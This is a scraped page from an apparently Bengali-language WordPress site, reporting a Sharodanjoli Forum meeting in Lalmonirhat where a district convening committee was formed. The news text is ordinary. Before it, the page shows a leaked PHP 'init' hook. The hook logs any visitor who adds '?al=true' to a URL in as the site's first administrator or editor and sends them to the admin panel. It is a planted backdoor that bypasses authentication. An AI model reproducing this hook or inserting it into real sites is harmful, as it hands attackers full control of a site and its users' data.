// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); শারদাঞ্জলি ফোরাম লালমনিরহাট জেলা শাখার উদ্যোগে আলোচনা সভা অনুষ্ঠিত হয়। – Sharodanjoli

শারদাঞ্জলি ফোরাম লালমনিরহাট জেলা শাখার উদ্যোগে আলোচনা সভা অনুষ্ঠিত হয়।

গত ৯ জুলাই, ২০১৯ ইং শুক্রবার সকাল ১০ টায় শারদাঞ্জলি ফোরাম লালমনিরহাট জেলা শাখার উদ্যোগে শ্রীশ্রী রাধাকৃষ্ণ মন্দির, বুড়িরহাট, লালমনিরহাটে এক আলোচনা সভা অনুষ্ঠিত হয়। উক্ত সভায় প্রধান অতিথি হিসেবে উপস্থিত ছিলেন শারদাঞ্জলি ফোরাম রংপুর জেলা কমিটির সাধারণ সম্পাদক ও কেন্দ্রীয় বিভাগীয় সাংগঠনিক সম্পাদক শ্রী সমরেশ দাস সাগর। বিশেষ অতিথি হিসেবে উপস্থিত ছিলেন শারদাঞ্জলি ফোরাম কেন্দ্রীয় কমিটির যুগ্ম-সাংগঠনিক সম্পাদক শ্রী সীমান্ত সেন। সভায় সভাপতিত্ব করেন শ্রী তাপস রায়। প্রথমে স্বাগত বক্তব্য প্রদান করেন শ্রী চিত্তরঞ্জন রায়। এছাড়াও উপস্থিত সম্মানিত সারথিরাও বক্তব্য প্রদান করেন। উপস্থিত সারথিদের সর্বসম্মত সিদ্ধান্ত মোতাবেক শ্রী তাপস রায়কে আহ্বায়ক এবং শ্রী অনুকুল রায়কে সদস্য সচিব নির্বাচিত করে ২১ সদস্য বিশিষ্ঠ একটি আহ্বায়ক কমিটি ঘোষণা করা হয়। কমিটি ঘোষণা করেন শ্রী সমরেশ দাস সাগর। সভা শেষে উপস্থিত সম্মানিত সারথিদের জন্য প্রসাদের আয়োজন করা হয়।

শারদাঞ্জলি ফোরাম কেন্দ্রীয় কার্যনির্বাহী কমিটির পক্ষ থেকে লালমনিরহাট জেলা আহবায়ক কমিটির নব নির্বাচিত সারথিবৃন্দকে ফুলেল শুভেচ্ছা এবং অভিনন্দন জানাচ্ছি। আশাকরি তাঁরা আগামী তিন মাসের মাসের মধ্যে পূর্ণাঙ্গ জেলা কমিটি ঘোষণা সহ শারদাঞ্জলি ফোরামের সকল ধর্মীয় ও মানবিক কার্যক্রম বাস্তবায়নে কাজ করে যাবেন।

জয় গীতা, জয় শারদাঞ্জলির জয়, জয় হোক মানবতার।

বাবুল চন্দ্র পাল
সভাপতি

লিটন চন্দ্র পাল
সাধারণ সম্পাদক
কেন্দ্রীয় কার্যনির্বাহী কমিটি

 

Leave a Reply

Your email address will not be published. Required fields are marked *